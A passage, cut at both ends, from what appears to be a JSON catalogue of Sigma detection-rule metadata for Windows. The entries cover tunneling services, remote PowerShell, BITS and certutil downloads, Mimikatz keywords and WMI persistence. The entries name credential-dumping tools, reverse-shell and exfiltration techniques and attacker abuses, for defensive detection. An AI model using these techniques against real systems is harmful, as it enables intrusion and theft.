], "filename": "net_connection_win_domain_ngrok_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml" ], "tags": [ "attack.exfiltration", "attack.command-and-control", "attack.t1567", "attack.t1568.002", "attack.t1572", "attack.t1090", "attack.t1102", "attack.s0508" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", "value": "Communication To Ngrok Tunneling Service Initiated" }, { "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\n", "meta": { "author": "Andreas Braathen (mnemonic.io)", "creation_date": "2024-06-17", "falsepositive": [ "Legitimate use of the LocaltoNet service." 
], "filename": "net_connection_win_domain_localtonet_tunnel.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications", "https://localtonet.com/documents/supported-tunnels", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_localtonet_tunnel.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.t1090", "attack.t1102" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ab65069-d82a-4d44-a759-466661a082d1", "value": "Communication To LocaltoNet Tunneling Service Initiated" }, { "description": "Detects network connections to BTunnels domains initiated by a process on the system.\nAttackers can abuse that feature to establish a reverse shell or persistence on a machine.\n", "meta": { "author": "Kamran Saifullah", "creation_date": "2024-09-13", "falsepositive": [ "Legitimate use of BTunnels will also trigger this." 
], "filename": "net_connection_win_domain_btunnels.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_btunnels.yml" ], "tags": [ "attack.exfiltration", "attack.t1567.001" ] }, "related": [ { "dest-uuid": "86a96bf6-cf8b-411c-aaeb-8959944d64f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e02c8ec-02b9-43e8-81eb-34a475ba7965", "value": "Network Connection Initiated To BTunnels Domains" }, { "description": "Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.\nThis could potentially indicates a remote PowerShell connection.\n", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Legitimate usage of remote PowerShell, e.g. 
remote administration and monitoring.", "Network Service user name of a not-covered localization" ], "filename": "net_connection_win_susp_remote_powershell_session.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", "value": "Potential Remote PowerShell Session Initiated" }, { "description": "Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.\n", "meta": { "author": "@d4ns4n_ (Wuerth-Phoenix)", "creation_date": "2024-09-02", "falsepositive": [ "Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally)." 
], "filename": "net_connection_win_remote_access_tools_anydesk_incoming_connection.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://asec.ahnlab.com/en/40263/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d58ba5c6-0ed7-4b9d-a433-6878379efda9", "value": "Remote Access Tool - AnyDesk Incoming Connection" }, { "description": "Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_malware_callback_port.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml" ], "tags": [ "attack.persistence", "attack.command-and-control", "attack.t1571" ] }, "related": [ { "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", "value": "Potentially Suspicious Malware Callback Communication" }, { "description": "Detects network 
connections from the Equation Editor process \"eqnedt32.exe\".", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-14", "falsepositive": [ "Unlikely" ], "filename": "net_connection_win_eqnedt.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/", "https://twitter.com/forensicitguy/status/1513538712986079238", "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" ], "tags": [ "attack.execution", "attack.t1203" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "value": "Network Connection Initiated By Eqnedt32.EXE" }, { "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". 
This could be indicative of potential post compromise internet test activity.", "meta": { "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-24", "falsepositive": [ "Legitimate use of the external websites for troubleshooting or network monitoring" ], "filename": "net_connection_win_domain_external_ip_lookup.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_external_ip_lookup.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "value": "Suspicious Network Connection to IP Lookup Service APIs" }, { "description": "Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2017-03-19", "falsepositive": [ "Unknown" ], "filename": "net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", "value": "Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location" }, { "description": "Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2023-04-28", "falsepositive": [ "Communication to other corporate systems that use IP addresses from public address spaces" ], "filename": "net_connection_win_winlogon_net_connections.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.command-and-control", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7610a4ea-c06d-495f-a2ac-0a696abcfd3b", "value": "Outbound Network Connection To Public IP Via Winlogon" }, { "description": "Detects a network connection initiated by the certutil.exe utility.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-09-02", 
"falsepositive": [ "Unknown" ], "filename": "net_connection_win_certutil_initiated_connection.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", "value": "Uncommon Network Connection Initiated By Certutil.EXE" }, { "description": "Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.\nIn this context attackers leverage known websites such as \"facebook\", \"youtube\", etc. 
In order to pass through undetected.\n", "meta": { "author": "Sorina Ionescu, X__Junior (Nextron Systems)", "creation_date": "2022-08-17", "falsepositive": [ "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.", "Ninite contacting githubusercontent.com" ], "filename": "net_connection_win_domain_dead_drop_resolvers.yml", "level": "high", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/", "https://github.com/kleiton0x00/RedditC2", "https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://twitter.com/kleiton0x7e/status/1600567316810551296", "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_dead_drop_resolvers.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1102.001" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", "value": "New Connection Initiated To Potential Dead Drop Resolver Domain" }, { "description": "Detects a network connection initiated by \"wordpad.exe\" over uncommon destination ports.\nThis might indicate potential process injection activity from a beacon or similar mechanisms.\n", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-12", "falsepositive": [ "Other 
ports can be used, apply additional filters accordingly" ], "filename": "net_connection_win_wordpad_uncommon_ports.yml", "level": "medium", "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml" ], "tags": [ "attack.defense-evasion", "attack.command-and-control" ] }, "uuid": "786cdae8-fefb-4eb2-9227-04e34060db01", "value": "Suspicious Wordpad Outbound Connections" }, { "description": "Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Likely" ], "filename": "raw_access_thread_susp_disk_access_using_uncommon_tools.yml", "level": "low", "logsource.category": "raw_access_thread", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml" ], "tags": [ "attack.defense-evasion", "attack.t1006" ] }, "related": [ { "dest-uuid": "0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", "value": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools" }, { "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", "meta": { "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", 
"creation_date": "2017-01-10", "falsepositive": [ "Naughty administrators", "AV Signature updates", "Files with Mimikatz in their filename" ], "filename": "win_alert_mimikatz_keywords.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://tools.thehacker.recipes/mimikatz/modules", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml" ], "tags": [ "attack.s0002", "attack.lateral-movement", "attack.credential-access", "car.2013-07-001", "car.2019-04-004", "attack.t1003.002", "attack.t1003.004", "attack.t1003.001", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "value": "Mimikatz Use" }, { "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-29", "falsepositive": [ "Unknown" ], "filename": "win_terminalservices_rdp_ngrok.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://ngrok.com/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64d51a51-32a6-49f0-9f3d-17e34d640272", "value": "Ngrok Usage with Remote Desktop Service" }, { "description": "Detects new BITS transfer job saving local files with potential suspicious extensions", "meta": { "author": "frack113", "creation_date": "2022-03-01", "falsepositive": [ "While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives" ], "filename": "win_bits_client_new_transfer_saving_susp_extensions.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "value": "BITS Transfer Job Downloading File Potential Suspicious Extension" }, { "description": "Detects the creation of a new bits job by PowerShell", "meta": { "author": "frack113", "creation_date": "2022-03-01", "falsepositive": [ "Administrator PowerShell scripts" ], "filename": "win_bits_client_new_job_via_powershell.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", "value": "New BITS Job Created Via PowerShell" }, { "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "value": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD" }, { "description": "Detects BITS transfer job downloading files from a file 
sharing domain.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", "value": "BITS Transfer Job Download From File Sharing Domains" }, { "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml" ], "tags": [ "attack.defense-evasion", 
"attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "value": "BITS Transfer Job Download To Potential Suspicious Folder" }, { "description": "Detects the creation of a new bits job by Bitsadmin", "meta": { "author": "frack113", "creation_date": "2022-03-01", "falsepositive": [ "Many legitimate applications or scripts could leverage \"bitsadmin\". This event is best correlated with EID 16403 via the JobID field" ], "filename": "win_bits_client_new_job_via_bitsadmin.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", "value": "New BITS Job Created Via Bitsadmin" }, { "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "win_bits_client_new_transfer_via_ip_address.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", 
"https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "value": "BITS Transfer Job Download From Direct IP" }, { "description": "Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.", "meta": { "author": "Pushkarev Dmitry", "creation_date": "2020-06-28", "falsepositive": [ "Needs AppLocker tuning or exceptions added in the SIEM" ], "filename": "win_applocker_file_was_not_allowed_to_run.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/using-event-viewer-with-applocker", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker", "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" ], "tags": [ "attack.execution", "attack.t1204.002", "attack.t1059.001", "attack.t1059.003", "attack.t1059.005", "attack.t1059.006", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "value": "File Was Not Allowed To Run" }, { "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", "meta": { "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "creation_date": "2017-08-22", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], "filename": "win_wmi_persistence.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "value": "WMI Persistence" }, { "description": "Detects activity when Windows Defender Firewall has been reset to its default 
configuration", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_reset_config.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset_config.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", "value": "Windows Defender Firewall Has Been Reset To Its Default Configuration" }, { "description": "Detects activity when the Windows Defender Firewall service failed to load Group Policy", "meta": { "author": "frack113", "creation_date": "2022-02-19", "falsepositive": "No established falsepositives", "filename": "win_firewall_as_failed_load_gpo.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", 